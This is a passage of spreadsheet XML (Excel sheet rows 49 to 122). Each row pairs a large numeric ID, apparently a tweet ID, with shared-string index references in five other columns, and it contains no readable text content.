    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A49">
        <v>1.2358653940043799E+18</v>
      </c>
      <c r="B49" t="s">
        <v>142</v>
      </c>
      <c r="C49" t="s">
        <v>1</v>
      </c>
      <c r="D49" t="s">
        <v>143</v>
      </c>
      <c r="E49" t="s">
        <v>144</v>
      </c>
      <c r="F49" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A50">
        <v>1.23586478226094E+18</v>
      </c>
      <c r="B50" t="s">
        <v>145</v>
      </c>
      <c r="C50" t="s">
        <v>1</v>
      </c>
      <c r="D50" t="s">
        <v>146</v>
      </c>
      <c r="E50" t="s">
        <v>147</v>
      </c>
      <c r="F50" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A51">
        <v>1.2358647076736599E+18</v>
      </c>
      <c r="B51" t="s">
        <v>148</v>
      </c>
      <c r="C51" t="s">
        <v>1</v>
      </c>
      <c r="D51" t="s">
        <v>149</v>
      </c>
      <c r="E51" t="s">
        <v>150</v>
      </c>
      <c r="F51" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A52">
        <v>1.23586448755235E+18</v>
      </c>
      <c r="B52" t="s">
        <v>151</v>
      </c>
      <c r="C52" t="s">
        <v>1</v>
      </c>
      <c r="D52" t="s">
        <v>152</v>
      </c>
      <c r="E52" t="s">
        <v>153</v>
      </c>
      <c r="F52" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A53">
        <v>1.23586376909325E+18</v>
      </c>
      <c r="B53" t="s">
        <v>154</v>
      </c>
      <c r="C53" t="s">
        <v>1</v>
      </c>
      <c r="D53" t="s">
        <v>155</v>
      </c>
      <c r="E53" t="s">
        <v>156</v>
      </c>
      <c r="F53" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A54">
        <v>1.23586297329119E+18</v>
      </c>
      <c r="B54" t="s">
        <v>157</v>
      </c>
      <c r="C54" t="s">
        <v>1</v>
      </c>
      <c r="D54" t="s">
        <v>158</v>
      </c>
      <c r="E54" t="s">
        <v>159</v>
      </c>
      <c r="F54" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A55">
        <v>1.23586238215021E+18</v>
      </c>
      <c r="B55" t="s">
        <v>160</v>
      </c>
      <c r="C55" t="s">
        <v>1</v>
      </c>
      <c r="D55" t="s">
        <v>161</v>
      </c>
      <c r="E55" t="s">
        <v>162</v>
      </c>
      <c r="F55" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A56">
        <v>1.2358618928133399E+18</v>
      </c>
      <c r="B56" t="s">
        <v>163</v>
      </c>
      <c r="C56" t="s">
        <v>1</v>
      </c>
      <c r="D56" t="s">
        <v>164</v>
      </c>
      <c r="E56" t="s">
        <v>165</v>
      </c>
      <c r="F56" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A57">
        <v>1.2358617932992901E+18</v>
      </c>
      <c r="B57" t="s">
        <v>166</v>
      </c>
      <c r="C57" t="s">
        <v>1</v>
      </c>
      <c r="D57" t="s">
        <v>167</v>
      </c>
      <c r="E57" t="s">
        <v>168</v>
      </c>
      <c r="F57" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A58">
        <v>1.23586135852607E+18</v>
      </c>
      <c r="B58" t="s">
        <v>169</v>
      </c>
      <c r="C58" t="s">
        <v>1</v>
      </c>
      <c r="D58" t="s">
        <v>170</v>
      </c>
      <c r="E58" t="s">
        <v>171</v>
      </c>
      <c r="F58" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A59">
        <v>1.2358608945312399E+18</v>
      </c>
      <c r="B59" t="s">
        <v>172</v>
      </c>
      <c r="C59" t="s">
        <v>1</v>
      </c>
      <c r="D59" t="s">
        <v>173</v>
      </c>
      <c r="E59" t="s">
        <v>174</v>
      </c>
      <c r="F59" t="s">
        <v>22563</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A60">
        <v>1.2358601695038001E+18</v>
      </c>
      <c r="B60" t="s">
        <v>175</v>
      </c>
      <c r="C60" t="s">
        <v>1</v>
      </c>
      <c r="D60" t="s">
        <v>176</v>
      </c>
      <c r="E60" t="s">
        <v>177</v>
      </c>
      <c r="F60" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A61">
        <v>1.2358591304615099E+18</v>
      </c>
      <c r="B61" t="s">
        <v>178</v>
      </c>
      <c r="C61" t="s">
        <v>1</v>
      </c>
      <c r="D61" t="s">
        <v>179</v>
      </c>
      <c r="E61" t="s">
        <v>180</v>
      </c>
      <c r="F61" t="s">
        <v>22563</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A62">
        <v>1.2358591147916001E+18</v>
      </c>
      <c r="B62" t="s">
        <v>181</v>
      </c>
      <c r="C62" t="s">
        <v>1</v>
      </c>
      <c r="D62" t="s">
        <v>182</v>
      </c>
      <c r="E62" t="s">
        <v>183</v>
      </c>
      <c r="F62" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A63">
        <v>1.23585900271554E+18</v>
      </c>
      <c r="B63" t="s">
        <v>184</v>
      </c>
      <c r="C63" t="s">
        <v>1</v>
      </c>
      <c r="D63" t="s">
        <v>185</v>
      </c>
      <c r="E63" t="s">
        <v>186</v>
      </c>
      <c r="F63" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A64">
        <v>1.23585897203426E+18</v>
      </c>
      <c r="B64" t="s">
        <v>187</v>
      </c>
      <c r="C64" t="s">
        <v>1</v>
      </c>
      <c r="D64" t="s">
        <v>188</v>
      </c>
      <c r="E64" t="s">
        <v>189</v>
      </c>
      <c r="F64" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A65">
        <v>1.23585857825199E+18</v>
      </c>
      <c r="B65" t="s">
        <v>190</v>
      </c>
      <c r="C65" t="s">
        <v>1</v>
      </c>
      <c r="D65" t="s">
        <v>191</v>
      </c>
      <c r="E65" t="s">
        <v>192</v>
      </c>
      <c r="F65" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A66">
        <v>1.23585850857202E+18</v>
      </c>
      <c r="B66" t="s">
        <v>193</v>
      </c>
      <c r="C66" t="s">
        <v>1</v>
      </c>
      <c r="D66" t="s">
        <v>194</v>
      </c>
      <c r="E66" t="s">
        <v>195</v>
      </c>
      <c r="F66" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A67">
        <v>1.23585801556514E+18</v>
      </c>
      <c r="B67" t="s">
        <v>196</v>
      </c>
      <c r="C67" t="s">
        <v>1</v>
      </c>
      <c r="D67" t="s">
        <v>197</v>
      </c>
      <c r="E67" t="s">
        <v>198</v>
      </c>
      <c r="F67" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A68">
        <v>1.23585801337151E+18</v>
      </c>
      <c r="B68" t="s">
        <v>196</v>
      </c>
      <c r="C68" t="s">
        <v>1</v>
      </c>
      <c r="D68" t="s">
        <v>199</v>
      </c>
      <c r="E68" t="s">
        <v>200</v>
      </c>
      <c r="F68" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A69">
        <v>1.2358579279671301E+18</v>
      </c>
      <c r="B69" t="s">
        <v>201</v>
      </c>
      <c r="C69" t="s">
        <v>1</v>
      </c>
      <c r="D69" t="s">
        <v>202</v>
      </c>
      <c r="E69" t="s">
        <v>203</v>
      </c>
      <c r="F69" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A70">
        <v>1.2358569941221E+18</v>
      </c>
      <c r="B70" t="s">
        <v>204</v>
      </c>
      <c r="C70" t="s">
        <v>1</v>
      </c>
      <c r="D70" t="s">
        <v>205</v>
      </c>
      <c r="E70" t="s">
        <v>54</v>
      </c>
      <c r="F70" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A71">
        <v>1.2358566761896499E+18</v>
      </c>
      <c r="B71" t="s">
        <v>206</v>
      </c>
      <c r="C71" t="s">
        <v>1</v>
      </c>
      <c r="D71" t="s">
        <v>207</v>
      </c>
      <c r="E71" t="s">
        <v>208</v>
      </c>
      <c r="F71" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A72">
        <v>1.23585666105245E+18</v>
      </c>
      <c r="B72" t="s">
        <v>209</v>
      </c>
      <c r="C72" t="s">
        <v>1</v>
      </c>
      <c r="D72" t="s">
        <v>210</v>
      </c>
      <c r="E72" t="s">
        <v>211</v>
      </c>
      <c r="F72" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A73">
        <v>1.2358560088381299E+18</v>
      </c>
      <c r="B73" t="s">
        <v>212</v>
      </c>
      <c r="C73" t="s">
        <v>1</v>
      </c>
      <c r="D73" t="s">
        <v>213</v>
      </c>
      <c r="E73" t="s">
        <v>214</v>
      </c>
      <c r="F73" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A74">
        <v>1.23585589974432E+18</v>
      </c>
      <c r="B74" t="s">
        <v>215</v>
      </c>
      <c r="C74" t="s">
        <v>1</v>
      </c>
      <c r="D74" t="s">
        <v>216</v>
      </c>
      <c r="E74" t="s">
        <v>217</v>
      </c>
      <c r="F74" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A75">
        <v>1.2358554675296799E+18</v>
      </c>
      <c r="B75" t="s">
        <v>218</v>
      </c>
      <c r="C75" t="s">
        <v>1</v>
      </c>
      <c r="D75" t="s">
        <v>219</v>
      </c>
      <c r="E75" t="s">
        <v>54</v>
      </c>
      <c r="F75" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A76">
        <v>1.2358553586371699E+18</v>
      </c>
      <c r="B76" t="s">
        <v>220</v>
      </c>
      <c r="C76" t="s">
        <v>1</v>
      </c>
      <c r="D76" t="s">
        <v>221</v>
      </c>
      <c r="E76" t="s">
        <v>222</v>
      </c>
      <c r="F76" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A77">
        <v>1.2358550251102999E+18</v>
      </c>
      <c r="B77" t="s">
        <v>223</v>
      </c>
      <c r="C77" t="s">
        <v>1</v>
      </c>
      <c r="D77" t="s">
        <v>224</v>
      </c>
      <c r="E77" t="s">
        <v>203</v>
      </c>
      <c r="F77" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A78">
        <v>1.23585484958703E+18</v>
      </c>
      <c r="B78" t="s">
        <v>225</v>
      </c>
      <c r="C78" t="s">
        <v>1</v>
      </c>
      <c r="D78" t="s">
        <v>226</v>
      </c>
      <c r="E78" t="s">
        <v>227</v>
      </c>
      <c r="F78" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="79" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A79">
        <v>1.23585455741186E+18</v>
      </c>
      <c r="B79" t="s">
        <v>228</v>
      </c>
      <c r="C79" t="s">
        <v>1</v>
      </c>
      <c r="D79" t="s">
        <v>229</v>
      </c>
      <c r="E79" t="s">
        <v>230</v>
      </c>
      <c r="F79" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A80">
        <v>1.2358539049836201E+18</v>
      </c>
      <c r="B80" t="s">
        <v>231</v>
      </c>
      <c r="C80" t="s">
        <v>1</v>
      </c>
      <c r="D80" t="s">
        <v>232</v>
      </c>
      <c r="E80" t="s">
        <v>233</v>
      </c>
      <c r="F80" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="81" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A81">
        <v>1.2358538785049999E+18</v>
      </c>
      <c r="B81" t="s">
        <v>234</v>
      </c>
      <c r="C81" t="s">
        <v>1</v>
      </c>
      <c r="D81" t="s">
        <v>235</v>
      </c>
      <c r="E81" t="s">
        <v>236</v>
      </c>
      <c r="F81" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="82" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A82">
        <v>1.2358534260528799E+18</v>
      </c>
      <c r="B82" t="s">
        <v>237</v>
      </c>
      <c r="C82" t="s">
        <v>1</v>
      </c>
      <c r="D82" t="s">
        <v>238</v>
      </c>
      <c r="E82" t="s">
        <v>239</v>
      </c>
      <c r="F82" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="83" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A83">
        <v>1.2358528288301199E+18</v>
      </c>
      <c r="B83" t="s">
        <v>240</v>
      </c>
      <c r="C83" t="s">
        <v>1</v>
      </c>
      <c r="D83" t="s">
        <v>241</v>
      </c>
      <c r="E83" t="s">
        <v>242</v>
      </c>
      <c r="F83" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="84" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A84">
        <v>1.2358527384680399E+18</v>
      </c>
      <c r="B84" t="s">
        <v>243</v>
      </c>
      <c r="C84" t="s">
        <v>1</v>
      </c>
      <c r="D84" t="s">
        <v>244</v>
      </c>
      <c r="E84" t="s">
        <v>245</v>
      </c>
      <c r="F84" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="85" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A85">
        <v>1.2358527011429E+18</v>
      </c>
      <c r="B85" t="s">
        <v>246</v>
      </c>
      <c r="C85" t="s">
        <v>1</v>
      </c>
      <c r="D85" t="s">
        <v>247</v>
      </c>
      <c r="E85" t="s">
        <v>248</v>
      </c>
      <c r="F85" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="86" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A86">
        <v>1.2358526541834601E+18</v>
      </c>
      <c r="B86" t="s">
        <v>249</v>
      </c>
      <c r="C86" t="s">
        <v>1</v>
      </c>
      <c r="D86" t="s">
        <v>250</v>
      </c>
      <c r="E86" t="s">
        <v>251</v>
      </c>
      <c r="F86" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="87" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A87">
        <v>1.23585042212592E+18</v>
      </c>
      <c r="B87" t="s">
        <v>252</v>
      </c>
      <c r="C87" t="s">
        <v>1</v>
      </c>
      <c r="D87" t="s">
        <v>253</v>
      </c>
      <c r="E87" t="s">
        <v>254</v>
      </c>
      <c r="F87" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="88" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A88">
        <v>1.2358501263016E+18</v>
      </c>
      <c r="B88" t="s">
        <v>255</v>
      </c>
      <c r="C88" t="s">
        <v>1</v>
      </c>
      <c r="D88" t="s">
        <v>256</v>
      </c>
      <c r="E88" t="s">
        <v>257</v>
      </c>
      <c r="F88" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="89" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A89">
        <v>1.2358494705599601E+18</v>
      </c>
      <c r="B89" t="s">
        <v>258</v>
      </c>
      <c r="C89" t="s">
        <v>1</v>
      </c>
      <c r="D89" t="s">
        <v>259</v>
      </c>
      <c r="E89" t="s">
        <v>260</v>
      </c>
      <c r="F89" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="90" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A90">
        <v>1.23584839541725E+18</v>
      </c>
      <c r="B90" t="s">
        <v>261</v>
      </c>
      <c r="C90" t="s">
        <v>1</v>
      </c>
      <c r="D90" t="s">
        <v>262</v>
      </c>
      <c r="E90" t="s">
        <v>263</v>
      </c>
      <c r="F90" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="91" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A91">
        <v>1.2358475939192901E+18</v>
      </c>
      <c r="B91" t="s">
        <v>264</v>
      </c>
      <c r="C91" t="s">
        <v>1</v>
      </c>
      <c r="D91" t="s">
        <v>265</v>
      </c>
      <c r="E91" t="s">
        <v>266</v>
      </c>
      <c r="F91" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="92" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A92">
        <v>1.2358470659319199E+18</v>
      </c>
      <c r="B92" t="s">
        <v>267</v>
      </c>
      <c r="C92" t="s">
        <v>1</v>
      </c>
      <c r="D92" t="s">
        <v>268</v>
      </c>
      <c r="E92" t="s">
        <v>269</v>
      </c>
      <c r="F92" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="93" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A93">
        <v>1.2358470476154099E+18</v>
      </c>
      <c r="B93" t="s">
        <v>270</v>
      </c>
      <c r="C93" t="s">
        <v>1</v>
      </c>
      <c r="D93" t="s">
        <v>271</v>
      </c>
      <c r="E93" t="s">
        <v>272</v>
      </c>
      <c r="F93" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A94">
        <v>1.2358463630001001E+18</v>
      </c>
      <c r="B94" t="s">
        <v>273</v>
      </c>
      <c r="C94" t="s">
        <v>1</v>
      </c>
      <c r="D94" t="s">
        <v>274</v>
      </c>
      <c r="E94" t="s">
        <v>275</v>
      </c>
      <c r="F94" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="95" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A95">
        <v>1.2358463122700201E+18</v>
      </c>
      <c r="B95" t="s">
        <v>276</v>
      </c>
      <c r="C95" t="s">
        <v>1</v>
      </c>
      <c r="D95" t="s">
        <v>277</v>
      </c>
      <c r="E95" t="s">
        <v>278</v>
      </c>
      <c r="F95" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="96" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A96">
        <v>1.2358461184931699E+18</v>
      </c>
      <c r="B96" t="s">
        <v>279</v>
      </c>
      <c r="C96" t="s">
        <v>1</v>
      </c>
      <c r="D96" t="s">
        <v>280</v>
      </c>
      <c r="E96" t="s">
        <v>281</v>
      </c>
      <c r="F96" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="97" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A97">
        <v>1.2358451334440599E+18</v>
      </c>
      <c r="B97" t="s">
        <v>282</v>
      </c>
      <c r="C97" t="s">
        <v>1</v>
      </c>
      <c r="D97" t="s">
        <v>283</v>
      </c>
      <c r="E97" t="s">
        <v>284</v>
      </c>
      <c r="F97" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="98" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A98">
        <v>1.2358450937156301E+18</v>
      </c>
      <c r="B98" t="s">
        <v>285</v>
      </c>
      <c r="C98" t="s">
        <v>1</v>
      </c>
      <c r="D98" t="s">
        <v>286</v>
      </c>
      <c r="E98" t="s">
        <v>287</v>
      </c>
      <c r="F98" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="99" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A99">
        <v>1.2358450717375099E+18</v>
      </c>
      <c r="B99" t="s">
        <v>288</v>
      </c>
      <c r="C99" t="s">
        <v>1</v>
      </c>
      <c r="D99" t="s">
        <v>289</v>
      </c>
      <c r="E99" t="s">
        <v>290</v>
      </c>
      <c r="F99" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A100">
        <v>1.2358447946743601E+18</v>
      </c>
      <c r="B100" t="s">
        <v>291</v>
      </c>
      <c r="C100" t="s">
        <v>1</v>
      </c>
      <c r="D100" t="s">
        <v>292</v>
      </c>
      <c r="E100" t="s">
        <v>293</v>
      </c>
      <c r="F100" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A101">
        <v>1.2358446474668301E+18</v>
      </c>
      <c r="B101" t="s">
        <v>294</v>
      </c>
      <c r="C101" t="s">
        <v>1</v>
      </c>
      <c r="D101" t="s">
        <v>295</v>
      </c>
      <c r="E101" t="s">
        <v>296</v>
      </c>
      <c r="F101" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="102" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A102">
        <v>1.23584423503677E+18</v>
      </c>
      <c r="B102" t="s">
        <v>297</v>
      </c>
      <c r="C102" t="s">
        <v>1</v>
      </c>
      <c r="D102" t="s">
        <v>298</v>
      </c>
      <c r="E102" t="s">
        <v>299</v>
      </c>
      <c r="F102" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A103">
        <v>1.23584362608255E+18</v>
      </c>
      <c r="B103" t="s">
        <v>300</v>
      </c>
      <c r="C103" t="s">
        <v>1</v>
      </c>
      <c r="D103" t="s">
        <v>301</v>
      </c>
      <c r="E103" t="s">
        <v>302</v>
      </c>
      <c r="F103" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A104">
        <v>1.2358433409243799E+18</v>
      </c>
      <c r="B104" t="s">
        <v>303</v>
      </c>
      <c r="C104" t="s">
        <v>1</v>
      </c>
      <c r="D104" t="s">
        <v>304</v>
      </c>
      <c r="E104" t="s">
        <v>195</v>
      </c>
      <c r="F104" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="105" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A105">
        <v>1.2358432969345101E+18</v>
      </c>
      <c r="B105" t="s">
        <v>305</v>
      </c>
      <c r="C105" t="s">
        <v>1</v>
      </c>
      <c r="D105" t="s">
        <v>306</v>
      </c>
      <c r="E105" t="s">
        <v>307</v>
      </c>
      <c r="F105" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A106">
        <v>1.23584291225392E+18</v>
      </c>
      <c r="B106" t="s">
        <v>308</v>
      </c>
      <c r="C106" t="s">
        <v>1</v>
      </c>
      <c r="D106" t="s">
        <v>309</v>
      </c>
      <c r="E106" t="s">
        <v>310</v>
      </c>
      <c r="F106" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A107">
        <v>1.2358423127159099E+18</v>
      </c>
      <c r="B107" t="s">
        <v>311</v>
      </c>
      <c r="C107" t="s">
        <v>1</v>
      </c>
      <c r="D107" t="s">
        <v>312</v>
      </c>
      <c r="E107" t="s">
        <v>90</v>
      </c>
      <c r="F107" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A108">
        <v>1.23584169473139E+18</v>
      </c>
      <c r="B108" t="s">
        <v>313</v>
      </c>
      <c r="C108" t="s">
        <v>1</v>
      </c>
      <c r="D108" t="s">
        <v>314</v>
      </c>
      <c r="E108" t="s">
        <v>315</v>
      </c>
      <c r="F108" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A109">
        <v>1.2358416349037901E+18</v>
      </c>
      <c r="B109" t="s">
        <v>316</v>
      </c>
      <c r="C109" t="s">
        <v>1</v>
      </c>
      <c r="D109" t="s">
        <v>317</v>
      </c>
      <c r="E109" t="s">
        <v>318</v>
      </c>
      <c r="F109" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="110" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A110">
        <v>1.2358414304314601E+18</v>
      </c>
      <c r="B110" t="s">
        <v>319</v>
      </c>
      <c r="C110" t="s">
        <v>1</v>
      </c>
      <c r="D110" t="s">
        <v>320</v>
      </c>
      <c r="E110" t="s">
        <v>230</v>
      </c>
      <c r="F110" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="111" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A111">
        <v>1.23584140887699E+18</v>
      </c>
      <c r="B111" t="s">
        <v>321</v>
      </c>
      <c r="C111" t="s">
        <v>1</v>
      </c>
      <c r="D111" t="s">
        <v>322</v>
      </c>
      <c r="E111" t="s">
        <v>6</v>
      </c>
      <c r="F111" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A112">
        <v>1.23584133651265E+18</v>
      </c>
      <c r="B112" t="s">
        <v>323</v>
      </c>
      <c r="C112" t="s">
        <v>1</v>
      </c>
      <c r="D112" t="s">
        <v>324</v>
      </c>
      <c r="E112" t="s">
        <v>325</v>
      </c>
      <c r="F112" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="113" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A113">
        <v>1.2358412423421599E+18</v>
      </c>
      <c r="B113" t="s">
        <v>326</v>
      </c>
      <c r="C113" t="s">
        <v>1</v>
      </c>
      <c r="D113" t="s">
        <v>327</v>
      </c>
      <c r="E113" t="s">
        <v>328</v>
      </c>
      <c r="F113" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="114" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A114">
        <v>1.23584116559474E+18</v>
      </c>
      <c r="B114" t="s">
        <v>329</v>
      </c>
      <c r="C114" t="s">
        <v>1</v>
      </c>
      <c r="D114" t="s">
        <v>330</v>
      </c>
      <c r="E114" t="s">
        <v>331</v>
      </c>
      <c r="F114" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A115">
        <v>1.2358407660075899E+18</v>
      </c>
      <c r="B115" t="s">
        <v>332</v>
      </c>
      <c r="C115" t="s">
        <v>1</v>
      </c>
      <c r="D115" t="s">
        <v>333</v>
      </c>
      <c r="E115" t="s">
        <v>251</v>
      </c>
      <c r="F115" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="116" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A116">
        <v>1.2358406528158999E+18</v>
      </c>
      <c r="B116" t="s">
        <v>334</v>
      </c>
      <c r="C116" t="s">
        <v>1</v>
      </c>
      <c r="D116" t="s">
        <v>335</v>
      </c>
      <c r="E116" t="s">
        <v>230</v>
      </c>
      <c r="F116" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A117">
        <v>1.23583964265139E+18</v>
      </c>
      <c r="B117" t="s">
        <v>336</v>
      </c>
      <c r="C117" t="s">
        <v>1</v>
      </c>
      <c r="D117" t="s">
        <v>337</v>
      </c>
      <c r="E117" t="s">
        <v>338</v>
      </c>
      <c r="F117" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="118" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A118">
        <v>1.2358395765827E+18</v>
      </c>
      <c r="B118" t="s">
        <v>339</v>
      </c>
      <c r="C118" t="s">
        <v>1</v>
      </c>
      <c r="D118" t="s">
        <v>340</v>
      </c>
      <c r="E118" t="s">
        <v>341</v>
      </c>
      <c r="F118" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A119">
        <v>1.23583931467359E+18</v>
      </c>
      <c r="B119" t="s">
        <v>342</v>
      </c>
      <c r="C119" t="s">
        <v>1</v>
      </c>
      <c r="D119" t="s">
        <v>343</v>
      </c>
      <c r="E119" t="s">
        <v>344</v>
      </c>
      <c r="F119" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="120" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A120">
        <v>1.23583908078657E+18</v>
      </c>
      <c r="B120" t="s">
        <v>345</v>
      </c>
      <c r="C120" t="s">
        <v>1</v>
      </c>
      <c r="D120" t="s">
        <v>346</v>
      </c>
      <c r="E120" t="s">
        <v>347</v>
      </c>
      <c r="F120" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A121">
        <v>1.2358386626144901E+18</v>
      </c>
      <c r="B121" t="s">
        <v>348</v>
      </c>
      <c r="C121" t="s">
        <v>1</v>
      </c>
      <c r="D121" t="s">
        <v>349</v>
      </c>
      <c r="E121" t="s">
        <v>350</v>
      </c>
      <c r="F121" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="122" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A122">
        <v>1.2358386179535601E+18</v>
      </c>
      <c r="B122" t="s">
        <v>351</v>
      </c>
      <c r="C122" t="s">
        <v>1</v>
      </c>
      <c r="D122" t="s">
